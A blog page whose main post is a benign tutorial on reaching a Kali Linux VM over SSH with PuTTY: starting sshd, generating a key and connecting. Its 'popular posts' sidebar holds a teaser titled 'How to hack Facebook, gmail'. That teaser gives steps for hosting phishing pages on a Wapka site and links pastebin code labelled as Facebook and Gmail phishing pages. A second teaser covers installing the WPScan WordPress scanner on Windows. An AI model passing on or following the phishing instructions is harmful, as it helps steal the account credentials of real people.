Skip to main content

Access Kali Linux through Remote System

There are several open source and enterprise software program through which we can access remote system. These software becomes a necessity when you setup a remote server and do not allow direct access to the server, as because of some security measures. PuTTy is one of the major terminal emulator through which we can access a remote server. PuTTy is a free and open-source terminal emulator, serial console and network file transfer application. It supports several network protocols, including SCP, SSH, Telnet and rlogin. Here, I am going to show you how to access Kali Linux through PuTTy. My base computer is running Windows 7 and Kali Linux is installed in a VMWare Player. So we can assume that Kali Linux is installed in a remote machine, as Windows 7 and of Kali Linux is on different network now.
Before we access Kali Linux through remote system, we need to make sure that ssh service is already running in Kali Linux.
To check the status of ssh service. Open root terminal and type service --status-all


In case it shows [-], then it means ssh service is not running and you have to enable ssh service first. To do this type apt-get install openssh-server from terminal window. Once, it shows [+] sign it means service is enable. Now, we type service ssh start to run ssh service.

Once we are sure that ssh service is running in remote Kali Linux, we have to perform one more step. Run ssh-keygen -t rsa to setup rsa key for ssh authentication and enter filename and passphrase to save the key. Once this is done we are good to go.

Now open PuTTy application and type the ip address of Kali Linux (if you are not sure then type ifconfig command on Kali Linux root terminal window). Let the port no. be default, select ssh and click on open. If everything is fine then it will ask you to enter login name and password. Once you enter the correct login and password, you will get privilege to access Kali Linux from console mode.

Comments

Popular posts from this blog

How to hack Facebook ,gmail , teen patti 2016

2016 latest trick to hack fb gmail etc 1. OpenWapka.mobi 2. Login with your Wapka account onWapka.mobior create a new one. 3. Now scroll down and open your Site( or create a new one & then click manage it ) 4. Now Click on Admin Mode 5. Click on#EDIT SITEoption at the bottom right side of your page. See image shown below.6. Then Click on WML/XHTML code option. 7. Copy All the HTML codes Given below click here for getting code Codes for gmail:-  http://pastebin.com/ckj1hh1L Fb security:-    http://www.iwebtool.com/tool/tools/code_viewer/code_viewer.php?domain=facebooktrickzone.wapka.mobi%2Fsite_0.xhtml&clientAction=534.click Other codes Autoliker Phishing Code for Facebook —    http://pastebin.com/G9G2bTpQ simple facebook login page code — http://pastebin.com/pE55h7GkAutoliker Facebook Phishing Code —- http://pastebin.com/Zakn5yhQAutoliker Phishing Code for Facebook level 2 —- http://pastebin.com/7R0NFCFJ New Fb security Phishin...

Wordpress hacking - How to install / run wpscan on windows xp / windows 7 / windows 10

HOW TO RUN WPSCAN ON WINDOWS Byrockstardevil Requirements: rubyinstaller Development Kit for rubyinstaller curl DLL for windows : libcurl.dll 1 - install rubyinstaller you must have Ruby 2.2.3 version . download links here : http://rubyinstaller.org/downloads/ for more info : https://github.com/oneclick/rubyinstaller/wiki 2 - install Development Kit for rubyinstaller download link : http://rubyinstaller.org/downloads/ how to install : https://github.com/oneclick/rubyinstaller/wiki/Development-Kit if you face that problem  "unknown encoding name -  (ArgumentError)" just type "chcp 1252" in cmd and hit enter 3 - install libcurl.dll A - Download libcurl.dll from : http://www.confusedbycode.com/curl/ B - copy libcurl.dll copy  libcurl.dll into ruby bin folder or wpscan folder and make sure to add it to your PATH. I also added .DLL to PATHEXT ex : C:\Ruby21-x64\bin\ you can visit : http://www.computerhope.com/issues/ch000549.htm to know to set the p...